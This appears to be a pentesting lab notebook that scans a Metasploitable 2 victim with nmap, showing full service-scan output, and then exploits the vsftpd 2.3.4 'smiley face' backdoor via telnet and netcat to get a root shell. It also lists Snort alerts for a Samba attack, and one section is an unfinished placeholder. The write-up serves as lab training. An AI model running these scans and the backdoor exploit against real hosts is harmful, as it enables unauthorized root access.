`11 1111 q q`# 🎩 Pentesting and white hacking
<br>
1. Lab installation
- IPS: [Snort](https://www.snort.org/).
- Victim machine: [Metasploitable 2](https://docs.rapid7.com/metasploit/metasploitable-2/).
<br>
2. Attack example to get victim real IP
- Spear | Mass phishing
- SE (Social Engineering)
- Reverse domain lookup
- DNS zone transfer
- IP grabbing
It is part of the first step of a pentest: Footprinting.
<br>
3. Finding available machines
For this part, we will admit that we found the victim IP.
Now, we want to list available machines on the network. This can be made with nmap using the CIDR notation of the network address `192.168.202.0/24` and the flag `-sn` to prevent port scanning.
```bash=
$ nmap -sn 192.168.202.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 10:28 EDT
Nmap scan report for 192.168.202.2
Host is up (0.00061s latency).
Nmap scan report for 192.168.202.134
Host is up (0.000098s latency).
Nmap scan report for 192.168.202.135
Host is up (0.00045s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.39 seconds
```
As we can see, we found 3 machines:
- 192.168.202.2
- 192.168.202.134
- 192.168.202.135
<br>
4. Banner grabbing & Enumeration
The next step is to get more specifics information about the machins such as services | OS version...
To do so, we can use advanced flags:
- `-sV`: service version scan.
- `-O`: OS version scan.
- `-sC`: scripts scan.
- `-T4`: increase scan speed.
```bash=
$sudo nmap -sV -O -sC -T4 192.168.202.135
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 11:17 EDT
Nmap scan report for 192.168.202.135
Host is up (0.00052s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.202.134
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2022-10-31T14:40:16+00:00; -37m32s from scanner time.
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 51606/udp mountd
| 100005 1,2,3 58134/tcp mountd
| 100021 1,3,4 46303/tcp nlockmgr
| 100021 1,3,4 49331/udp nlockmgr
| 100024 1 35846/tcp status
|_ 100024 1 36881/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 10
| Capabilities flags: 43564
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsCompression, SwitchToSSLAfterHandshake, ConnectWithDatabase
| Status: Autocommit
|_ Salt: I7s`fb95=qB8.}PT8Y8L
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2022-10-31T14:40:16+00:00; -37m32s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 1:09:04
| source ident: nmap
| source host: BC5D6C09.8654285E.FFFA6D49.IP
|_ error: Closing Link: tgzudjgjc[192.168.202.134] (Quit: tgzudjgjc)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:E9:DF:27 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2022-10-31T10:40:08-04:00
|_clock-skew: mean: 22m28s, deviation: 2h00m00s, median: -37m32s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Nmap done: 1 IP address (1 host up) scanned in 22.25 seconds
```
From this scan, we obtain the following information:
- 192.168.202.2: Router
- 192.168.202.134: Random computer
- 192.168.202.135: Metasploitable
- 21/tcp open ftp vsftpd 2.3.4
-22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
-23/tcp open telnet Linux telnetd
-25/tcp open smtp Postfix smtpd
-53/tcp open domain ISC BIND 9.4.2
-80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
-111/tcp open rpcbind 2 (RPC #100000)
-139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
-445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
-512/tcp open exec netkit-rsh rexecd
-513/tcp open login OpenBSD or Solaris rlogind
-514/tcp open tcpwrapped
-1099/tcp open java-rmi GNU Classpath grmiregistry
-1524/tcp open bindshell Metasploitable root shell
-2049/tcp open nfs 2-4 (RPC #100003)
-2121/tcp open ftp ProFTPD 1.3.1
-3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
-8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
-8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
<br>
5. Exploiting smiley face :)
From the previous scan, we figgured out that the last machine has `vsftpd 2.3.4`. This version is special has it has a backdoor named smiley face due to the credentials used to create the bind shell backdoor. The name of this vulnerability comes from the fact that we have to send a smiley face as `USER` to initiate the vulnerable code.
Origin of the backdoor: (`0x3a` -> `:` | `0x29` -> `)`)
Exploit:
```bash=
# first terminal
$ telnet 192.168.202.135
Trying 172.16.24.135...
Connected to 172.16.24.135.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER nope:)
331 Please specify the password.
PASS nope_again
# second terminal
nc 172.16.24.135 6200
id
uid=0(root) gid=0(root)
```
*The victim IP is not the same as earlier because we did it on another machine*
Abusing it, we obtain a beatiful root shell on the machine :)
<br>
6. Vulnerability scanning
For this step, we will use Nessus as vulnerability scanner.
*The full report is in linked files.*
<br>
7. XXX
XXX
```
11/03-10:34:09.779448 [**] [1:43004:5] SERVER-SAMBA Samba is_known_pipe arbitrary module load code execution attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.202.134:49706 -> 192.168.202.135:445
11/03-10:34:10.877778 [**] [1:43004:5] SERVER-SAMBA Samba is_known_pipe arbitrary module load code execution attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.202.134:39558 -> 192.168.202.135:445
```
<br>
8. Pentesting steps
- Footprinting (Passiv enumeration)
- Scanning (Active or passiv enumeration)
- Gainning access
- Maintaining access
- Clearing Track
Google Drive
Gist
Clipboard
Sign in with Wallet
